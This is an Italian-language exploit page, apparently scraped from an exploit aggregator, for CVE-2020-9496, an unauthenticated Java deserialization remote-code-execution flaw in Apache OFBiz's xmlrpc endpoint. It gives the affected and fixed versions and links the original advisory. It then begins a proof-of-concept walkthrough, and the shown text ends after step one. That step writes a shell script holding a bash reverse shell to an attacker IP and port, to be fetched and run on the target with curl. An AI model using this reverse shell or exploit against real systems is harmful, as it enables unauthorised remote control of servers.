## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-CYBER-NIZ-CVE-2020-9496
# CVE-2020-9496 - RCE
Poiché le 2 richieste relative a xmlrpc in webtools (xmlrpc e ping) non utilizzano l'autenticazione, sono vulnerabili a una deserializzazione non sicura. Questo problema è stato segnalato al team di sicurezza da Alvaro Munoz some-email@example.com del team GitHub Security Lab.
Questa vulnerabilità esiste a causa di problemi di serializzazione Java durante l'elaborazione delle richieste inviate a /webtools/control/xmlrpc. Un attaccante remoto non autenticato può sfruttare questa vulnerabilità inviando una richiesta appositamente predisposta. Uno sfruttamento riuscito comporterebbe l'esecuzione arbitraria di codice.
# Versione Affetta 17.12.01
# Versioni Corrette 18.12.01, 17.12.04
Blog Originale: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
Per far funzionare questo POC dobbiamo inserire uno script shell e eseguire/accedere a quel file tramite curl.
### PASSO 1: Crea un file shell con una riga di comando Bash con il tuo indirizzo IP e la porta.
root@kitploit:~
$ cat shell.sh
#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.x.x/1337 0>&1